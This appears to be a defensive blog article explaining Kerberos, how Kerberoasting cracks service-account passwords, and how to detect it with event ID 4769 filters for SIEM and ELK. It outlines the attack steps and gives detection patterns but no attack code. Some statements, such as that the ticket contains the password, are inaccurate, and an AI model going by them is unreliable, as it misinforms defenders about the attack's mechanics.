Kerberos Protocol
Kerberos Protocol is an authentication protocol developed to be encrypted and more secure, without explicit password sharing in an untrusted network environment. The Kerberos protocol uses the Shared Secret Key method when encrypting information in the network environment.
Key Distribution Center:
Key Distribution Center is a service that provides management in the kerberos protocol. KDC aims to create a symmetric encryption by creating a unique ticket type that allows access of two or more systems in a network in order to establish a secure communication before the data is distributed and shared. Key Distribution center is a Domain control server that requires permission before communicating.
Authentication Service (AS):
It is included in the Key Distribution Center (KDC) and is responsible for the authentication part. AS checks if the user is in the Active Directory domain. It also performs authentication by checking the correctness of the password.
KRBTGT:
- It is the user account that enables the Key Distribution Center (KDC) to run and be managed. The KRBTGT account is an account that is created automatically and is not renamed or deleted in any way.
Ticket Granting Service (TGS):
- This service provides the creation, verification and management of tickets required for users who have passed identity verification.
What is Kerberoasting?
Kerberoasting is an attack technique used to crack the passwords of service user accounts. It is generally used to gain access to the target system, to increase rights and authorization, and to ensure persistence in the target system. With this method, not only the service passwords can be captured, but also the user information in the service ticket received to access the service can be changed.
How do Kerberoasting attacks work?
In Kerberoasting attacks, attackers often exploit weak and insecure passwords. The working principle is as follows;
- An attacker first authenticates a domain user account that he has taken over and starts a new session.
- The attacker, who appears to be the user who owns the domain, requests a ticket from TGS.
- The attacker receives a ticket from the Kerberos key distribution center (KDC). This ticket contains the password of the user account.
- The attacker captures the TGS ticket and kerberos in memory and takes them offline.
- The attacker attempts to steal the SPN values and user credentials owned by Active directory accounts to obtain the user account password using brute force techniques such as Hashcat or brute force tools.
- The attacker, who obtains the user account password, tries to log in to the account and gains access to the network where this account is located, from the system.
- Finally, the attacker can steal the data of the compromised account, elevate the rights and privileges, and then open backdoors on the network to facilitate the next hijacking attempts.
How to Detect and Stop Kerberoasting Attacks
Some methods have been developed to reduce and limit Kerberos attack effectiveness. If we talk about these methods;
Powerful Password Management:
As in password cracking attacks, creating strong passwords in Kerberoasting attack methods will weaken the attack effect. For this;
– The password must be at least 25 characters.
– It should not consist of a recognizable word or phrase. It should consist of uppercase and lowercase letters, numbers and signs.
– A new password must be assigned every 30 days.
Thanks to the methods mentioned above, especially SPNs make service accounts more reliable by users.
MFA Usage:
It is another way to prevent an attacker from accessing a network using Multi-Factor authentication method.
Kerberos Event Log Configuration:
It is one of the most important methods used in the Kerberos Detection phase. Kerberos TGS service tickets need to be requested as they use the RC4 encryption method. Domain Controller is necessary for our security to record and monitor successful Kerberos TGS ticket requests in Event Logs.
In order to implement this process, it is necessary to configure “Audit Kerberos Service Ticket Transactions” under Account Login in Domain Controller. Thus, Kerberos TGS Service ticket requests are recorded in Event Logs. Transactions take place over the following Event IDs:
– 4769: A Kerberos service ticket (TGS) has been requested
– 4770: A Kerberos service ticket was renewed
Information about 4769 Event ID is given above.
Detection:
SIEM or EDR products are used to detect such attacks. In order for these processes to take place, the filtering method is used. The following are the filters to be done for the filtering process:
1- Event ID 4769: Event log ID number 4769 is detected.
2- Service Name not equal to 'krbtgt': Brings services whose service name is not the same as 'krbtgt'.
3- Service Name does not end with '$': Lists services whose Service Name does not end with '$'.
4- Account Name does not match ' $@ ': Account name ' $@ Returns accounts that do not match '.
5- Failure Code is '0x0': Error Code '0x0' lists the codes.
6- Ticket Encryption Type is '0x17': Returns Ticket Encryption Type 0x17.
Using these delimiters, we can generate specific search queries in our SIEM or event aggregator system to determine if someone has requested SPN tickets. While displaying this in an ELK Stack (Elasticsearch, Logstash, Kibana), you can translate it to Splunk or other query languages.
Filtering for ELK:
1- event_id "is" 4769
2- Status "is" 0x0
3- Ticket_Encryption_Type “is” 0x17
4- Service_Name “is not” krbtgt